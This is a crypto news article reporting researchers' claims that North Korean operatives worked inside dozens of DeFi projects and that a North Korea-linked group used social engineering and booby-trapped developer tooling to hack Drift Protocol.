This Is How Secret North Korean Agents Infiltrated Top Crypto Protocols, Researcher Claims

North Korea‑connected operatives have spent years quietly embedding themselves inside crypto companies and DeFi projects.

A Long-Standing Crypto-Infiltration Saga

News and reports from the Democratic People’s Republic of Korea tend to have a particular conspiracy theory-action movie feel to them. However, they also have the tendency to be true and not over exaggerated at all.

This time, security researcher and MetaMask developer Taylor Monahan said on a Sunday post on the social network X that these methods date back to DeFi’s formative years, with actors linked to the DPRK quietly contributing to several major, widely used protocols.

Yuppppppp

Lots of DPRK IT Workers built the protocols you know and love, all the way back to defi summer

The “7 years blockchain dev experience” on their resume is not a lie. https://t.co/EQNgl5KhJ5

— Tay 💖 (@tayvano_) April 5, 2026

She claims that North Korean IT workers have quietly worked inside more than 40 DeFi projects over roughly seven years, including protocols that became household names after DeFi summer.

oh god uhhhh like sushi, thorchain, yam, pickle, harvest, reclaim, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…

— Tay 💖 (@tayvano_) April 5, 2026

These workers often have “real” on‑chain experience (seven years of blockchain dev) but operate under stolen or synthetic identities, plugging into teams via normal hiring funnels

Her posts reply to tim, a pseudonymous builder and public face of Titan, a Solana‑based DEX aggregator and routing project, claiming that for a previous job they interviewed an extremely qualified candidate that turned out to be a Lazarus operative, the North-Korea affiliated group that has funneled billions of dollars in stolen money through cryptocurrency networks.

at a previous job, we interviewed someone who turned out to be a Lazarus operative. he did video calls and was extremely qualified

we invited him for in person interviews and he ultimately declined to fly out, so we passed

only later did we find his name in a Lazarus info dump… https://t.co/Vnvffrkjee

— tim | Titan (@timahhl) April 5, 2026

Renowned crypto detective ZachXBT also replied to tim’s post, explaining that this is not just “Lazarus” but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the Reconnaissance General Bureau and optimized for financial cybercrime. Their methods are based on “basic, relentless” outreach via LinkedIn, job boards, interviews, Zoom, plus remote dev roles that teams still grant far too easily.

Lazarus Group is the collective name for all DPRK state sponsored cyber actors.

The main issue is everyone groups them all together when the complexity of threats are different.

Threats via job postings, LinkedIn, email, Zoom, or interviews are basic and in no way… pic.twitter.com/NL8Jck5edN

— ZachXBT (@zachxbt) April 5, 2026

Recent U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctions and Chainalysis findings signal that DPRK IT networks generated $800 million in 2024 alone and have moved billions in stolen crypto since 2017, feeding weapons of mass destruction (WMD) and missile programs.

New Information On The Crypto-Hack On Drift Protocol

The April 1st $285 million attack on Drift Protocol reignited fears about insider threats from North Korea, especially after the protocol itself confirmed on Saturday that speculation linking the attack to North Korean hacking groups was right.

https://t.co/qYBMCup9i6

— Drift (@DriftProtocol) April 5, 2026

They attributed the attack “with medium confidence” to UNC4736, a North Korea–aligned, state‑sponsored hacking group.

The protocol claimed the attackers relied on a well elaborated social engineering strategy: fake professional personas, in‑person conference interactions, and booby‑trapped developer tooling to compromise contributors before finally executing the exploit. The attackers posed as a legitimate trading firm, met Drift contributors in person across several countries and used fully constructed identities with work histories and professional networks before triggering the exploit

The attackers weaponized common developer tooling by slipping malicious tasks into VS Code and Cursor configurations, delivering a compromised repository that contributors ran locally without realizing it. All these combined make the incident far more like an insider‑style supply‑chain compromise than a straightforward smart contract.

The day after the attack, Ledger CTO Charles Guillement linked the attack method to Bybit’s $1.4 billion hack, which was attributed to the regime’s cyber units. Then, on Friday, blockchain analytics firm Elliptic released an investigation claiming the on‑chain behavior, laundering methods, and network‑level indicators match the techniques seen in prior DPRK‑linked operations. Bitcoinist covered the story.

Market Implications

This saga crypto-hacking has turned into structural national‑security risk. Regulators and sanctions bodies are already tightening around DPRK IT networks, and more aggressive enforcement is likely to follow.

Large, state‑linked exploits create latent protocol risk: higher insurance premia, potential delistings, governance infighting over restitution, and longer risk‑off periods for DeFi tokens and perp volumes.

At the moment of writing, BTC trades for the highs $69k on the daily chart. Source: BTCUSDT on Tradingview.

Cover image from Perplexity. BTCUSDT chart from Tradingview.